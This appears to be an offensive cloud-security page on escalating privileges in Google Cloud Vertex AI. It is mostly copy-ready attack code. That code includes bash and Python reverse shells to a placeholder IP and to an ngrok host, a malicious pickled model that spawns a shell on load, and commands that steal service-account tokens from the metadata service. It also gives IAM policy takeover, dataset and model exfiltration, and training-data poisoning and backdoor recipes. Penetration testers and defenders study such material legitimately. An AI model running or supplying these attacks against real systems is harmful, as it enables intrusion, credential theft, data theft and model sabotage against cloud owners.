# GCP - Vertex AI Privesc
## Vertex AI
For more information about Vertex AI check:
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on the target service account, an attacker can execute arbitrary code with elevated privileges.

This is achieved by creating a custom training job that runs attacker-controlled code (either a custom container or a Python package). By specifying a privileged service account with the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure and has access to the GCP metadata service, which allows extraction of the service account's OAuth access token.

**Impact**: Full privilege escalation to the target service account's permissions.
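Before launching the job shown below, you can verify that your identity can actually impersonate the target service account. A quick pre-flight sketch, where the `<project-id>` and `<target-sa>` placeholders are assumptions to be replaced:

```bash
# testIamPermissions on the SA resource returns "iam.serviceAccounts.actAs"
# only if your current identity holds it on that service account
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://iam.googleapis.com/v1/projects/<project-id>/serviceAccounts/<target-sa>@<project-id>.iam.gserviceaccount.com:testIamPermissions" \
  -d '{"permissions": ["iam.serviceAccounts.actAs"]}'
```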
<details>
<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```
</details>
<details>
<summary>Alternative: Extract the token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```

</details>
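Whichever method you use, once you hold the access token you can drive Google APIs directly from your own machine. A quick sketch for checking what the stolen identity can do, assuming the token was saved into a hypothetical `TOKEN` variable and `<project-id>` is the victim project:

```bash
# Hypothetical: TOKEN holds the access token exfiltrated from the metadata service
TOKEN="ya29....."

# testIamPermissions returns the subset of the queried permissions the identity holds
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>:testIamPermissions" \
  -d '{"permissions": ["resourcemanager.projects.setIamPolicy", "iam.serviceAccounts.getAccessToken", "storage.buckets.list"]}'
```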
### `aiplatform.models.upload`, `aiplatform.models.get`
This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges via an endpoint deployment or a batch prediction job.
> [!NOTE]
> To perform this attack you need a world-readable GCS bucket, or you must create a new one, to upload the model artifacts.
<details>
<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/malicious-model/ \
  --display-name=malicious-sklearn \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```
</details>
<details>
<summary>Upload model with reverse shell in container args</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
> [!DANGER]
> After uploading the malicious model, an attacker can wait for someone to use it, or trigger it themselves via an endpoint deployment or a batch prediction job.
### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)
If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can leverage malicious models already uploaded to the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models through an endpoint, all you need to do is:
<details>
<summary>Deploy malicious model to endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
  --region=<region> \
  --display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
  --region=<region> \
  --model=<model-id> \
  --display-name=revshell-deployment \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
  --machine-type=n1-standard-2 \
  --min-replica-count=1
```
</details>
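If you only hold `aiplatform.endpoints.setIamPolicy`, you do not need to deploy anything yourself: you can grant your own principal control over an existing endpoint and proceed from there. A hedged sketch using the generic `:setIamPolicy` REST method (the member and role values are illustrative assumptions; setting a policy this way replaces existing bindings, so merge with the output of `:getIamPolicy` in practice):

```bash
# Sketch: grant yourself admin on an existing endpoint via setIamPolicy
PROJECT="your-project"
REGION="us-central1"
ENDPOINT_ID="<endpoint-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/endpoints/${ENDPOINT_ID}:setIamPolicy" \
  -d '{
    "policy": {
      "bindings": [
        {
          "role": "roles/aiplatform.admin",
          "members": ["user:attacker@example.com"]
        }
      ]
    }
  }'
```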
### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
If you have permissions to create **batch prediction jobs** and run them with a service account, you can reach the metadata service. The malicious code executes from a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).
> [!NOTE]
> This attack requires first uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
<details>
<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
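While waiting for the reverse shell, you can confirm the job was accepted and is spinning up by polling the same collection. A short sketch reusing the `PROJECT`/`REGION` variables from above:

```bash
# List batch prediction jobs and grab names/states (JOB_STATE_PENDING/RUNNING/...)
curl -s \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs" \
  | grep -E '"(displayName|state)"'
```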
### `aiplatform.models.export`
If you have the `models.export` permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.
> [!NOTE]
> To perform this attack you need a GCS bucket that is world readable and writable, or you must create a new bucket to receive the exported model artifacts.
<details>
<summary>Export model artifacts to a GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>
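The `:export` call is asynchronous and returns a long-running operation. A small sketch for polling it until the artifacts land in your bucket, assuming `OPERATION_NAME` is the `name` field from the export response (hypothetical variable):

```bash
# Hypothetical: OPERATION_NAME comes from the JSON response of the :export call,
# e.g. projects/.../locations/.../models/.../operations/1234567890
OPERATION_NAME="<operation-name-from-export-response>"

curl -s \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/${OPERATION_NAME}"
# Once the response contains "done": true, run the gsutil download above
```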
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Create **ML pipeline jobs** that execute multiple steps with arbitrary containers and achieve privilege escalation via reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.
> [!NOTE]
> You need a world-writable GCS bucket to use as the pipeline root.
<details>
<summary>Install the Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>
<details>
<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "<region>"
TARGET_SA = "<target-sa>@<project-id>.iam.gserviceaccount.com"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print("  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")
```
</details>
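To confirm the pipeline was accepted and the reverse shell container is actually starting, you can poll the pipeline jobs collection. A brief sketch, assuming the same `<region>`/`<project-id>` placeholders as the script above:

```bash
# List pipeline jobs with their states (PENDING/RUNNING/SUCCEEDED/FAILED)
curl -s \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/pipelineJobs" \
  | grep -E '"(displayName|state)"'
```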
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges via custom training containers.

Hyperparameter tuning jobs let you run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and attaching a privileged service account, you can achieve privilege escalation.

**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
  - metricId: accuracy
    goal: MAXIMIZE
  parameters:
  - parameterId: learning_rate
    doubleValueSpec:
      minValue: 0.001
      maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
  - machineSpec:
      machineType: n1-standard-4
    replicaCount: 1
    containerSpec:
      imageUri: python:3.11-slim
      command: ["python3"]
      args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
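Trial containers can take a few minutes to start; the job and trial states can be checked with gcloud. A short sketch, assuming `<job-id>` is the ID returned by the create command:

```bash
# Inspect the tuning job; trial states appear once containers are scheduled
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>
```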
### `aiplatform.datasets.export`
Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (gcloud CLI does not support datasets).

Datasets often contain the original training data, which can include PII, confidential business data, or other sensitive information used to train production models.
<details>
<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl

# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data
```
</details>
### `aiplatform.datasets.import`
Import malicious or poisoned data into existing datasets to **manipulate model training and inject backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (gcloud CLI does not support datasets).

By importing carefully crafted data into a dataset used to train ML models, an attacker can:

- Inject backdoors into models (trigger-activated misclassification)
- Poison training data to degrade model performance
- Inject data to make models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective against datasets used for:

- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)
<details>
<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
```

</details>
**Attack scenarios:**
<details>
<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```
</details>

<details>
<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```
</details>

<details>
<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```
</details>

<details>
<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```
</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
> - Security systems: bypass facial recognition or anomaly detection
> - Fraud detection: train models to ignore specific fraud patterns
> - Content moderation: get harmful content classified as safe
> - Medical AI: misclassify critical health conditions
> - Autonomous systems: manipulate object detection for safety-critical decisions
**Impact**:

- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against specific inputs
- Information leakage through model behavior
- Long-term persistence (models trained on poisoned data inherit the backdoor)
### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`
> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the Vertex AI Workbench Managed Notebooks deprecation. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor schedules notebook runs on Vertex AI custom training infrastructure with a specified service account; it is effectively a convenience wrapper around `customJobs.create`. For privilege escalation via notebooks, use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.

The following technique is kept for historical context only and is not recommended for new assessments.
Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are well suited for interactive-style code execution with a service account, since they support Python code cells and shell commands.
<details>
<summary>Create malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```
</details>
<details>
<summary>Run notebook with target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```

</details>